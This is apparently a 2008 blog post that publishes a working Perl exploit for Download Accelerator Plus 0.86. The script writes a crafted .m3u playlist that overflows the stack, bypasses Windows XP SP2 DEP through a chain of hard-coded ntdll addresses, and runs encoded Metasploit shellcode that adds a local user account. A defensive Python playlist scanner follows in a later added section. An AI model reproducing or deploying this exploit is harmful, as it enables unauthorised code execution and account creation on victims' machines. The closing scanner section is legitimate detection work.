Wednesday, 19 March 2008

Download Accelerator Plus (DAP) + DEP (Data Execution Prevention)

Here is the exploit so you can see how to switch off that lovely protection that ships with Windows XP SP2 (where the default policy is OptIn, so DEP is on only for a handful of processes such as explorer and off for everything else) and with Windows 2003 (where the default policy is OptOut, so DEP is on for every process unless it is explicitly excluded).

Tutorial download link

PS: note that it also works when DEP is disabled.

#!/usr/bin/perl
###############################################################################
#
# Download Accelerator Plus (DAP) 0.86 .m3u exploit with DEP bypass
#
# Exploit by: Trancek
# Email: trancek@yashira.org
#
###############################################################################
use strict;
use warnings;

print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";

# Every address below is hard-coded for ntdll.dll / kernel on Windows XP SP2
# (Spanish); they must be located again for any other build or language.
my $localhost   = "http://localhost/";
my $junk        = "\x90" x 14115;      # filler up to the saved return address
my $moval1      = "\x80\x20\x96\x7C";  # mov al,1 --> ntdll.dll (XP SP2 Spanish)
my $padding1    = "\x90" x 4;          # NOPs
my $especialret = "\x94\x11\x91\x7C";  # mov ebp,esp (+ code up to ret) --> ntdll.dll (XP SP2 Spanish)
my $padding2    = "\x90" x 8;          # NOPs
my $ret         = "\xED\x1E\x95\x7C";  # jmp esp, Windows XP SP2 (Spanish)
my $cpmal1      = "\xF8\xD3\x92\x7C";  # cmp al,1 --> ntdll.dll (XP SP2 Spanish)
my $nopeando    = "\x90" x 20;         # NOP sled in front of the shellcode


# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".
"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".
"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".
"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".
"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".
"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".
"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".
"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".
"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".
"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";


# Write the payload as raw bytes; binmode stops Perl on Windows from
# translating any 0x0A it might find into CR LF.
open(my $m3u, ">", "./vulnerable.m3u") or die "Cannot create vulnerable.m3u: $!";
binmode($m3u);
print $m3u $localhost, $junk, $moval1, $padding1, $especialret,
           $padding2, $ret, $cpmal1, $nopeando, $shellcode;
close($m3u) or die "Cannot close vulnerable.m3u: $!";

print "Instructions: the user has to press the Verify button.\n";
print "This exploit bypasses DEP on Windows XP SP2.\n\n";
print "File created\n";
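A defender looking at this is less interested in regenerating the payload than in recognising it. The following scanner is an added example written for this page (in Python rather than the post's Perl); it is not code from the original post or from DAP. It reads a playlist the way a line-oriented player does and flags any entry that no real URL would produce: thousands of bytes long or carrying non-printable bytes. For a flagged entry it measures the NOP sled and decodes the little-endian dword that follows it, which in a classic stack overflow is the overwritten return address. MAX_ENTRY_LEN, MIN_SLED and the embedded SAMPLE playlist are assumptions for illustration, with the sled shrunk from the post's 14115 bytes to 64.

```python
"""Playlist scanner for entries shaped like the DAP .m3u overflow payload.

Added example, not code from the original post: it reads a playlist the way a
line-oriented player does and flags entries that no real URL would produce.
MAX_ENTRY_LEN, MIN_SLED and SAMPLE are assumptions made for illustration.
"""
import string

PRINTABLE = set(string.printable.encode())  # ASCII bytes a genuine entry may contain
MAX_ENTRY_LEN = 2048   # assumption: legitimate stream URLs stay far below this
MIN_SLED = 8           # assumption: this many consecutive 0x90 bytes counts as a NOP sled


def parse_m3u(data: bytes) -> list:
    """Return the playlist entries, skipping blank lines and '#' directives."""
    entries = []
    for line in data.splitlines():  # handles \n, \r\n and \r line endings
        if not line or line.startswith(b"#"):
            continue
        entries.append(line)
    return entries


def analyze_entry(entry: bytes):
    """Describe why an entry looks like an overflow payload, or return None."""
    nonprintable = sum(1 for b in entry if b not in PRINTABLE)
    if len(entry) <= MAX_ENTRY_LEN and nonprintable == 0:
        return None
    report = {"length": len(entry), "nonprintable": nonprintable}
    # In a classic stack overflow the bytes right after the NOP sled are the
    # overwritten return address, stored little-endian on x86.
    sled_start = entry.find(b"\x90" * MIN_SLED)
    if sled_start != -1:
        i = sled_start
        while i < len(entry) and entry[i] == 0x90:
            i += 1
        report["sled_length"] = i - sled_start
        if i + 4 <= len(entry):
            report["ret_candidate"] = int.from_bytes(entry[i:i + 4], "little")
    return report


def scan_m3u(data: bytes) -> list:
    """Return (entry_index, report) pairs for every suspicious entry."""
    findings = []
    for index, entry in enumerate(parse_m3u(data)):
        report = analyze_entry(entry)
        if report is not None:
            findings.append((index, report))
    return findings


# Constructed sample (not a real capture): one benign entry, then an entry
# shaped like the post's payload (URL prefix, NOP sled, a little-endian
# address, more NOPs) with the sled shrunk from 14115 bytes to 64.
SAMPLE = (
    b"#EXTM3U\r\n"
    b"http://example.invalid/song.mp3\r\n"
    b"http://localhost/" + b"\x90" * 64 + b"\x80\x20\x96\x7C" + b"\x90" * 4 + b"\r\n"
)

if __name__ == "__main__":
    for index, report in scan_m3u(SAMPLE):
        print(f"entry {index}: {report}")
```

On the sample the benign entry is silent and the second entry is reported with a 64-byte sled followed by 0x7C962080, the first ntdll address the post's chain returns into. Because the playlist is parsed line by line, a payload cannot contain 0x0A or 0x0D without being cut short, which is also why the post's chain uses the alphanumeric PexAlphaNum encoder for its shellcode.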
